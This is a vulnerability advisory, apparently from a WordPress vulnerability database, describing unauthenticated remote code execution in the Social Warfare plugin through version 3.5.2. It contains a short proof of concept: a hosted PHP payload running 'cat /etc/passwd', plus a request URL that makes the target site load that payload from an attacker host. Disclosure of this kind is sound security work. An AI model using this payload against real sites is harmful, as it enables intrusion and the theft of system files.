Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)



Description
Unauthenticated remote code execution has been discovered in functionality that handles settings import.
Proof of Concept
1. Create payload file and host it on a location accessible by a targeted website. Payload content : "<pre>system('cat /etc/passwd')</pre>"

2. Visit http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt

3. Content of /etc/passwd will be returned

Affects Plugin

fixed in version 3.5.3

References

URL https://www.webarxsecurity.com/social-warfare-vulnerability/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Original Researcher Luka Sikic
Submitter Luka Sikic
Submitter Website https://www.webarxsecurity.com
Submitter Twitter webarx_security
Views 7385
Verified No
WPVDB ID 9259

Timeline

Publicly Published 2019-03-25 (8 months ago)
Added 2019-04-24 (7 months ago)
Last Updated 2019-11-01 (13 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin